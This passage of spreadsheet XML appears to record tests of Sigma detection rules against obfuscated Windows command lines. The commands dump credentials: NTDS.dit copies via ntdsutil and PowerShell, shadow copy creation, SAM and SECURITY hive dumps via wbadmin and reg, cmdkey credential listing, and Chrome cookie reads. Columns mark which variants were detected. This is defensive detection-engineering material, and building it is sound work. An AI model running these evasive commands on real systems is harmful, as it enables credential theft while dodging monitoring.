      <c r="H304" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I304" s="43" t="inlineStr">
        <is>
          <t>Suspicious Process Patterns NTDS.DIT Exfil (8bc64091-6875-4881-aaf9-7bd25b5dda08)</t>
        </is>
      </c>
      <c r="J304" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K304" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="305" ht="15.75" customHeight="1" s="42">
      <c r="A305" s="43" t="n"/>
      <c r="B305" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_ntds</t>
        </is>
      </c>
      <c r="C305" s="44" t="inlineStr">
        <is>
          <t>Suspicious Process Patterns NTDS.DIT Exfil</t>
        </is>
      </c>
      <c r="D305" s="44" t="inlineStr">
        <is>
          <t>8bc64091-6875-4881-aaf9-7bd25b5dda08</t>
        </is>
      </c>
      <c r="E305" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" ntdsutil "a^c i ntds" ifm "cre^ate full C:\exfil" q q</t>
        </is>
      </c>
      <c r="F305" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G305" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H305" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I305" s="43" t="n"/>
      <c r="J305" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K305" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="306" ht="15.75" customHeight="1" s="42">
      <c r="A306" s="43" t="n"/>
      <c r="B306" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_ntds</t>
        </is>
      </c>
      <c r="C306" s="44" t="inlineStr">
        <is>
          <t>Suspicious Process Patterns NTDS.DIT Exfil</t>
        </is>
      </c>
      <c r="D306" s="44" t="inlineStr">
        <is>
          <t>8bc64091-6875-4881-aaf9-7bd25b5dda08</t>
        </is>
      </c>
      <c r="E306" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Copy-Item ('C:\Windows\NTDS\nt' + 'ds.dit') -Destination 'C:\exfil\data.bin'"</t>
        </is>
      </c>
      <c r="F306" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G306" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H306" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I306" s="43" t="n"/>
      <c r="J306" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K306" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="307" ht="15.75" customHeight="1" s="42">
      <c r="A307" s="43" t="n"/>
      <c r="B307" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_ntds</t>
        </is>
      </c>
      <c r="C307" s="44" t="inlineStr">
        <is>
          <t>Suspicious Process Patterns NTDS.DIT Exfil</t>
        </is>
      </c>
      <c r="D307" s="44" t="inlineStr">
        <is>
          <t>8bc64091-6875-4881-aaf9-7bd25b5dda08</t>
        </is>
      </c>
      <c r="E307" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -commaNd "Copy-Item ('C:\Windows\NTDS\nt' + 'ds.dit') -Destination 'C:\exfil\data.bin'"</t>
        </is>
      </c>
      <c r="F307" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G307" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H307" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I307" s="43" t="n"/>
      <c r="J307" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K307" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="308" ht="15.75" customHeight="1" s="42">
      <c r="A308" s="43" t="n"/>
      <c r="B308" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_ntds</t>
        </is>
      </c>
      <c r="C308" s="44" t="inlineStr">
        <is>
          <t>Suspicious Process Patterns NTDS.DIT Exfil</t>
        </is>
      </c>
      <c r="D308" s="44" t="inlineStr">
        <is>
          <t>8bc64091-6875-4881-aaf9-7bd25b5dda08</t>
        </is>
      </c>
      <c r="E308" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "Copy-Item ('C:\Windows\NTDS\nt' + 'ds.dit') -Destination 'C:\exfil\data.bin'"</t>
        </is>
      </c>
      <c r="F308" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G308" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H308" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I308" s="43" t="n"/>
      <c r="J308" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K308" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="309" ht="15.75" customHeight="1" s="42">
      <c r="A309" s="43" t="n"/>
      <c r="B309" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_ntds</t>
        </is>
      </c>
      <c r="C309" s="44" t="inlineStr">
        <is>
          <t>Suspicious Process Patterns NTDS.DIT Exfil</t>
        </is>
      </c>
      <c r="D309" s="44" t="inlineStr">
        <is>
          <t>8bc64091-6875-4881-aaf9-7bd25b5dda08</t>
        </is>
      </c>
      <c r="E309" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COmMAnd "Copy-Item ('C:\Windows\NTDS\nt' + 'ds.dit') -Destination 'C:\exfil\data.bin'"</t>
        </is>
      </c>
      <c r="F309" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G309" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H309" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I309" s="43" t="n"/>
      <c r="J309" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K309" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="310" ht="15.75" customHeight="1" s="42">
      <c r="A310" s="43" t="n"/>
      <c r="B310" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_ntds</t>
        </is>
      </c>
      <c r="C310" s="44" t="inlineStr">
        <is>
          <t>Suspicious Process Patterns NTDS.DIT Exfil</t>
        </is>
      </c>
      <c r="D310" s="44" t="inlineStr">
        <is>
          <t>8bc64091-6875-4881-aaf9-7bd25b5dda08</t>
        </is>
      </c>
      <c r="E310" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COMMAnD "Copy-Item ('C:\Windows\NTDS\nt' + 'ds.dit') -Destination 'C:\exfil\data.bin'"</t>
        </is>
      </c>
      <c r="F310" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G310" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H310" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I310" s="43" t="n"/>
      <c r="J310" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K310" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="311" ht="15.75" customHeight="1" s="42">
      <c r="A311" s="43" t="n"/>
      <c r="B311" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_ntds</t>
        </is>
      </c>
      <c r="C311" s="44" t="inlineStr">
        <is>
          <t>Suspicious Process Patterns NTDS.DIT Exfil</t>
        </is>
      </c>
      <c r="D311" s="44" t="inlineStr">
        <is>
          <t>8bc64091-6875-4881-aaf9-7bd25b5dda08</t>
        </is>
      </c>
      <c r="E311" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -coMMAND "Copy-Item ('C:\Windows\NTDS\nt' + 'ds.dit') -Destination 'C:\exfil\data.bin'"</t>
        </is>
      </c>
      <c r="F311" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G311" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H311" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I311" s="43" t="n"/>
      <c r="J311" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K311" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="312" ht="15.75" customHeight="1" s="42">
      <c r="A312" s="43" t="n"/>
      <c r="B312" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_shadow_copies_creation</t>
        </is>
      </c>
      <c r="C312" s="44" t="inlineStr">
        <is>
          <t>Shadow Copies Creation Using Operating Systems Utilities</t>
        </is>
      </c>
      <c r="D312" s="44" t="inlineStr">
        <is>
          <t>b17ea6f7-6e90-447e-a799-e6c0a493d6ce</t>
        </is>
      </c>
      <c r="E312" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" wmic shadowcopy cr^eate Volume=C:\</t>
        </is>
      </c>
      <c r="F312" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G312" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H312" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I312" s="44" t="n"/>
      <c r="J312" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K312" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="313" ht="15.75" customHeight="1" s="42">
      <c r="A313" s="43" t="n"/>
      <c r="B313" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_shadow_copies_creation</t>
        </is>
      </c>
      <c r="C313" s="44" t="inlineStr">
        <is>
          <t>Shadow Copies Creation Using Operating Systems Utilities</t>
        </is>
      </c>
      <c r="D313" s="44" t="inlineStr">
        <is>
          <t>b17ea6f7-6e90-447e-a799-e6c0a493d6ce</t>
        </is>
      </c>
      <c r="E313" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Invoke-WmiMethod -Class ('Win32_Shad' + 'owCopy') -Name ('Cre' + 'ate') -ArgumentList 'C:\'"</t>
        </is>
      </c>
      <c r="F313" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G313" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H313" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I313" s="43" t="n"/>
      <c r="J313" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K313" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="314" ht="15.75" customHeight="1" s="42">
      <c r="A314" s="43" t="n"/>
      <c r="B314" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_shadow_copies_creation</t>
        </is>
      </c>
      <c r="C314" s="44" t="inlineStr">
        <is>
          <t>Shadow Copies Creation Using Operating Systems Utilities</t>
        </is>
      </c>
      <c r="D314" s="44" t="inlineStr">
        <is>
          <t>b17ea6f7-6e90-447e-a799-e6c0a493d6ce</t>
        </is>
      </c>
      <c r="E314" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COMMaND "Invoke-WmiMethod -Class ('Win32_Shad' + 'owCopy') -Name ('Cre' + 'ate') -ArgumentList 'C:\'"</t>
        </is>
      </c>
      <c r="F314" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G314" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H314" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I314" s="44" t="n"/>
      <c r="J314" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K314" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="315" ht="15.75" customHeight="1" s="42">
      <c r="A315" s="43" t="n"/>
      <c r="B315" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_shadow_copies_creation</t>
        </is>
      </c>
      <c r="C315" s="44" t="inlineStr">
        <is>
          <t>Shadow Copies Creation Using Operating Systems Utilities</t>
        </is>
      </c>
      <c r="D315" s="44" t="inlineStr">
        <is>
          <t>b17ea6f7-6e90-447e-a799-e6c0a493d6ce</t>
        </is>
      </c>
      <c r="E315" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "Invoke-WmiMethod -Class ('Win32_Shad' + 'owCopy') -Name ('Cre' + 'ate') -ArgumentList 'C:\'"</t>
        </is>
      </c>
      <c r="F315" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G315" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H315" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I315" s="44" t="n"/>
      <c r="J315" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K315" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="316" ht="15.75" customHeight="1" s="42">
      <c r="A316" s="44" t="n"/>
      <c r="B316" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_shadow_copies_creation</t>
        </is>
      </c>
      <c r="C316" s="44" t="inlineStr">
        <is>
          <t>Shadow Copies Creation Using Operating Systems Utilities</t>
        </is>
      </c>
      <c r="D316" s="44" t="inlineStr">
        <is>
          <t>b17ea6f7-6e90-447e-a799-e6c0a493d6ce</t>
        </is>
      </c>
      <c r="E316" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -coMmANd "Invoke-WmiMethod -Class ('Win32_Shad' + 'owCopy') -Name ('Cre' + 'ate') -ArgumentList 'C:\'"</t>
        </is>
      </c>
      <c r="F316" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G316" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H316" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I316" s="43" t="n"/>
      <c r="J316" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K316" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="317" ht="15.75" customHeight="1" s="42">
      <c r="A317" s="43" t="n"/>
      <c r="B317" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wbadmin_dump_sensitive_files</t>
        </is>
      </c>
      <c r="C317" s="44" t="inlineStr">
        <is>
          <t>Sensitive File Dump Via Wbadmin.EXE</t>
        </is>
      </c>
      <c r="D317" s="44" t="inlineStr">
        <is>
          <t>8b93a509-1cb8-42e1-97aa-ee24224cdc15</t>
        </is>
      </c>
      <c r="E317" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /C wbadmin start backup -"backupTarget:e:" /"include:C:\Windows\System32\conf^ig\SAM"</t>
        </is>
      </c>
      <c r="F317" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G317" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H317" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I317" s="43" t="n"/>
      <c r="J317" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K317" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="318" ht="15.75" customHeight="1" s="42">
      <c r="A318" s="43" t="n"/>
      <c r="B318" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wbadmin_dump_sensitive_files</t>
        </is>
      </c>
      <c r="C318" s="43" t="inlineStr">
        <is>
          <t>Sensitive File Dump Via Wbadmin.EXE</t>
        </is>
      </c>
      <c r="D318" s="43" t="inlineStr">
        <is>
          <t>8b93a509-1cb8-42e1-97aa-ee24224cdc15</t>
        </is>
      </c>
      <c r="E318" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /"c" wbadmin start backup -BAckuptARgEt:E: -INcLuDE:c:\wIndOWs\System32\CoNF^iG\SAM</t>
        </is>
      </c>
      <c r="F318" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G318" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H318" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I318" s="43" t="inlineStr">
        <is>
          <t>Copying Sensitive Files with Credential Data (e7be6119-fc37-43f0-ad4f-1f3f99be2f9f)</t>
        </is>
      </c>
      <c r="J318" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K318" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="319" ht="15.75" customHeight="1" s="42">
      <c r="A319" s="44" t="n"/>
      <c r="B319" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wbadmin_dump_sensitive_files</t>
        </is>
      </c>
      <c r="C319" s="44" t="inlineStr">
        <is>
          <t>Sensitive File Dump Via Wbadmin.EXE</t>
        </is>
      </c>
      <c r="D319" s="44" t="inlineStr">
        <is>
          <t>8b93a509-1cb8-42e1-97aa-ee24224cdc15</t>
        </is>
      </c>
      <c r="E319" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" wbadmin start backup -backupTarget:e: -"include:C:\Windows\System32\conf^ig\SAM"</t>
        </is>
      </c>
      <c r="F319" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G319" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H319" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I319" s="43" t="n"/>
      <c r="J319" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K319" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="320" ht="15.75" customHeight="1" s="42">
      <c r="A320" s="44" t="n"/>
      <c r="B320" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wbadmin_restore_sensitive_files</t>
        </is>
      </c>
      <c r="C320" s="44" t="inlineStr">
        <is>
          <t>Sensitive File Recovery From Backup Via Wbadmin.EXE</t>
        </is>
      </c>
      <c r="D320" s="44" t="inlineStr">
        <is>
          <t>84972c80-251c-4c3a-9079-4f00aad93938</t>
        </is>
      </c>
      <c r="E320" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" wbadmin start r^ecovery -veRsIOn:03/31/2024-09:00 -itemtype:File -ItEmS:c:\WIndoWS\systEM32\CONFiG\sECURITY -recoveryTarget:C:\temp</t>
        </is>
      </c>
      <c r="F320" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G320" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H320" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I320" s="43" t="inlineStr">
        <is>
          <t>Copying Sensitive Files with Credential Data (e7be6119-fc37-43f0-ad4f-1f3f99be2f9f); Copying Sensitive Files with Credential Data (e7be6119-fc37-43f0-ad4f-1f3f99be2f9f)</t>
        </is>
      </c>
      <c r="J320" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K320" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="321" ht="15.75" customHeight="1" s="42">
      <c r="A321" s="43" t="n"/>
      <c r="B321" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wbadmin_restore_sensitive_files</t>
        </is>
      </c>
      <c r="C321" s="44" t="inlineStr">
        <is>
          <t>Sensitive File Recovery From Backup Via Wbadmin.EXE</t>
        </is>
      </c>
      <c r="D321" s="44" t="inlineStr">
        <is>
          <t>84972c80-251c-4c3a-9079-4f00aad93938</t>
        </is>
      </c>
      <c r="E321" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" wbadmin start r^ecovery -version:03/31/2024-09:00 -itemtype:File -items:C:\Windows\System32\config\SECURITY -"recoveryTarget:C:\temp"</t>
        </is>
      </c>
      <c r="F321" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G321" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H321" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I321" s="43" t="inlineStr">
        <is>
          <t>Copying Sensitive Files with Credential Data (e7be6119-fc37-43f0-ad4f-1f3f99be2f9f); Copying Sensitive Files with Credential Data (e7be6119-fc37-43f0-ad4f-1f3f99be2f9f)</t>
        </is>
      </c>
      <c r="J321" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K321" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="322" ht="15.75" customHeight="1" s="42">
      <c r="A322" s="43" t="n"/>
      <c r="B322" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wbadmin_restore_sensitive_files</t>
        </is>
      </c>
      <c r="C322" s="44" t="inlineStr">
        <is>
          <t>Sensitive File Recovery From Backup Via Wbadmin.EXE</t>
        </is>
      </c>
      <c r="D322" s="44" t="inlineStr">
        <is>
          <t>84972c80-251c-4c3a-9079-4f00aad93938</t>
        </is>
      </c>
      <c r="E322" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" wbadmin start r^ecovery -version:03/31/2024-09:00 -iteMTYpe:fILe -"items:C:\Windows\System32\config\SECURITY" -recoveryTarget:C:\temp</t>
        </is>
      </c>
      <c r="F322" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G322" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H322" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I322" s="43" t="inlineStr">
        <is>
          <t>Copying Sensitive Files with Credential Data (e7be6119-fc37-43f0-ad4f-1f3f99be2f9f); Copying Sensitive Files with Credential Data (e7be6119-fc37-43f0-ad4f-1f3f99be2f9f)</t>
        </is>
      </c>
      <c r="J322" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K322" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="323" ht="15.75" customHeight="1" s="42">
      <c r="A323" s="43" t="n"/>
      <c r="B323" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_dumping_sensitive_hives</t>
        </is>
      </c>
      <c r="C323" s="43" t="inlineStr">
        <is>
          <t>Dumping of Sensitive Hives Via Reg.EXE</t>
        </is>
      </c>
      <c r="D323" s="43" t="inlineStr">
        <is>
          <t>fd877b94-9bb5-4191-bb25-d79cbd93c167</t>
        </is>
      </c>
      <c r="E323" s="43" t="inlineStr">
        <is>
          <t>reg.exe "save" HKLM\SAM C:\temp\sam.save</t>
        </is>
      </c>
      <c r="F323" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G323" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H323" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I323" s="43" t="n"/>
      <c r="J323" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K323" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="324" ht="15.75" customHeight="1" s="42">
      <c r="A324" s="43" t="inlineStr">
        <is>
          <t>t1003.005</t>
        </is>
      </c>
      <c r="B324" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmdkey_adding_generic_creds</t>
        </is>
      </c>
      <c r="C324" s="43" t="inlineStr">
        <is>
          <t>New Generic Credentials Added Via Cmdkey.EXE</t>
        </is>
      </c>
      <c r="D324" s="43" t="inlineStr">
        <is>
          <t>b1ec66c6-f4d1-4b5c-96dd-af28ccae7727</t>
        </is>
      </c>
      <c r="E324" s="43" t="inlineStr">
        <is>
          <t>cmdkey.exe "/generic:10.10.10.10" "/user:Administrator" "/pass:P@ssw0rd123!"</t>
        </is>
      </c>
      <c r="F324" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G324" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H324" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I324" s="43" t="n"/>
      <c r="J324" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K324" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="325" ht="15.75" customHeight="1" s="42">
      <c r="A325" s="44" t="inlineStr">
        <is>
          <t>t1003.005</t>
        </is>
      </c>
      <c r="B325" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmdkey_adding_generic_creds</t>
        </is>
      </c>
      <c r="C325" s="44" t="inlineStr">
        <is>
          <t>New Generic Credentials Added Via Cmdkey.EXE</t>
        </is>
      </c>
      <c r="D325" s="44" t="inlineStr">
        <is>
          <t>b1ec66c6-f4d1-4b5c-96dd-af28ccae7727</t>
        </is>
      </c>
      <c r="E325" s="43" t="inlineStr">
        <is>
          <t>cmdkey.exe /add:10.10.10.10 /user:Administrator /pass:P@ssw0rd123!</t>
        </is>
      </c>
      <c r="F325" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G325" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H325" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I325" s="43" t="n"/>
      <c r="J325" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K325" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="326" ht="15.75" customHeight="1" s="42">
      <c r="A326" s="43" t="n"/>
      <c r="B326" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmdkey_recon</t>
        </is>
      </c>
      <c r="C326" s="44" t="inlineStr">
        <is>
          <t>Potential Reconnaissance For Cached Credentials Via Cmdkey.EXE</t>
        </is>
      </c>
      <c r="D326" s="44" t="inlineStr">
        <is>
          <t>07f8bdc2-c9b3-472a-9817-5a670b872f53</t>
        </is>
      </c>
      <c r="E326" s="44" t="inlineStr">
        <is>
          <t>cmdkey.exe "/list"</t>
        </is>
      </c>
      <c r="F326" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G326" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H326" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I326" s="44" t="n"/>
      <c r="J326" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K326" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="327" ht="15.75" customHeight="1" s="42">
      <c r="A327" s="43" t="n"/>
      <c r="B327" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmdkey_recon</t>
        </is>
      </c>
      <c r="C327" s="44" t="inlineStr">
        <is>
          <t>Potential Reconnaissance For Cached Credentials Via Cmdkey.EXE</t>
        </is>
      </c>
      <c r="D327" s="44" t="inlineStr">
        <is>
          <t>07f8bdc2-c9b3-472a-9817-5a670b872f53</t>
        </is>
      </c>
      <c r="E327" s="44" t="inlineStr">
        <is>
          <t>cmdkey.exe,/list</t>
        </is>
      </c>
      <c r="F327" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G327" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H327" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I327" s="44" t="n"/>
      <c r="J327" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K327" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="328" ht="15.75" customHeight="1" s="42">
      <c r="A328" s="43" t="n"/>
      <c r="B328" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_dumping_sensitive_hives</t>
        </is>
      </c>
      <c r="C328" s="43" t="inlineStr">
        <is>
          <t>Dumping of Sensitive Hives Via Reg.EXE</t>
        </is>
      </c>
      <c r="D328" s="43" t="inlineStr">
        <is>
          <t>fd877b94-9bb5-4191-bb25-d79cbd93c167</t>
        </is>
      </c>
      <c r="E328" s="43" t="inlineStr">
        <is>
          <t>reg.exe "save" HKLM\SAM C:\temp\sam.save</t>
        </is>
      </c>
      <c r="F328" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G328" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H328" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I328" s="43" t="n"/>
      <c r="J328" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K328" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="329" ht="15.75" customHeight="1" s="42">
      <c r="A329" s="44" t="inlineStr">
        <is>
          <t>t1539</t>
        </is>
      </c>
      <c r="B329" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sqlite_chromium_profile_data</t>
        </is>
      </c>
      <c r="C329" s="44" t="inlineStr">
        <is>
          <t>SQLite Chromium Profile Data DB Access</t>
        </is>
      </c>
      <c r="D329" s="44" t="inlineStr">
        <is>
          <t>24c77512-782b-448a-8950-eddb0785fc71</t>
        </is>
      </c>
      <c r="E329" s="44" t="inlineStr">
        <is>
          <t>C:\ExternalPayloads\sqlite3.exe "C:\Users\thaim\AppData\Local\Google\Chrome\User Data/Default/Network/Cookies"</t>
        </is>
      </c>
      <c r="F329" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G329" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H329" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I329" s="44" t="n"/>
      <c r="J329" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K329" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="330" ht="15.75" customHeight="1" s="42">
      <c r="A330" s="44" t="inlineStr">
        <is>
          <t>t1539</t>
        </is>
      </c>
      <c r="B330" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sqlite_chromium_profile_data</t>
        </is>
      </c>
      <c r="C330" s="44" t="inlineStr">
        <is>
          <t>SQLite Chromium Profile Data DB Access</t>
        </is>
      </c>
      <c r="D330" s="44" t="inlineStr">
        <is>
          <t>24c77512-782b-448a-8950-eddb0785fc71</t>
        </is>
      </c>
      <c r="E330" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c C:\ExternalPayloads\sqlite3.exe "C:\Users\thaim\AppData\Local\Google\Chrome\User Data\Default\Network\Cook^ies"</t>
        </is>
      </c>
      <c r="F330" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G330" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H330" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I330" s="44" t="n"/>
      <c r="J330" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K330" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="331" ht="15.75" customHeight="1" s="42">
      <c r="A331" s="44" t="inlineStr">
        <is>
          <t>t1539</t>
        </is>
      </c>
      <c r="B331" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sqlite_chromium_profile_data</t>
        </is>
      </c>
      <c r="C331" s="44" t="inlineStr">
        <is>
          <t>SQLite Chromium Profile Data DB Access</t>
        </is>
      </c>
      <c r="D331" s="44" t="inlineStr">
        <is>
          <t>24c77512-782b-448a-8950-eddb0785fc71</t>
        </is>
      </c>
      <c r="E331" s="44" t="inlineStr">
        <is>
          <t>C:\ExternalPayloads\sqlite3.exe "C:\Users\thaim\AppData\Local\Google\Chrome\User Data\Default\Network\Cook""ies"</t>
        </is>
      </c>
      <c r="F331" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G331" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H331" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I331" s="44" t="n"/>
      <c r="J331" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K331" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="332" ht="15.75" customHeight="1" s="42">
      <c r="A332" s="44" t="n"/>
      <c r="B332" s="44" t="inlineStr">
        <is>
